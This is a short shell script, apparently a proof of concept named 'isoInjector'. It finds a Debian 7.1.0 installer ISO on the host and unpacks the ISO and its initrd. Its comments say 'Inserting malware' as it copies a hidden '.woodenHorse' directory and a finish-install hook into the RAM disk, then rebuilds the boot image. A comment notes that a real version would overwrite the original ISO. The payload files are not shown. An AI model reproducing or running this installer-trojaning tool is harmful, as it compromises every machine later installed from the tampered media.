#!/bin/sh

# Defines
extractedIsoDir="/root/isoInjector/extractedIso"
extractedRamDir="/root/isoInjector/irmod"
output="/root/isoInjector/output.iso" # in the real one, this would just be
																			# the initial location of the ISO

updatedb 
numISOsFound=`locate -c debian-7.1.0-amd64-DVD-1.iso`

if [ $numISOsFound -eq "0" ]; then
    echo "ISO not found"
    exit 0
fi
echo "found ISO"

isoLocation=`locate debian-7.1.0-amd64-DVD-1.iso | head -n 1`
echo "$isoLocation"

# Extract all the needed parts of the ISO
echo "Extracting ISO portions"
bsdtar -C $extractedIsoDir -xf $isoLocation
cd irmod/
gzip -d < $extractedIsoDir/install.amd/initrd.gz | \
        cpio --extract --make-directories --no-absolute-filenames
cd ..


# Insert malware into RAM disk
echo "Inserting malware"
cp -R .woodenHorse/ $extractedRamDir/.woodenHorse
cp 069user-setup $extractedRamDir/usr/lib/finish-install.d/
cp .padding $extractedIsoDir/tools/

# Rebuild ram disk
echo "Rebuilding RAM disk"
cd irmod/
find . | cpio -H newc --create | \
    gzip -9 > $extractedIsoDir/install.amd/initrd.gz
cd ..

# Rebuilding iso
echo "Rebuilding ISO"
genisoimage -r -V "label" -cache-inodes -J -l -b isolinux/isolinux.bin \
        -c isolinux/boot.cat -no-emul-boot -boot-load-size 4 -boot-info-table \
        -o $output $extractedIsoDir

# Cleanup
rm -rf $extractedIsoDir/*
rm -rf $extractedRamDir/*
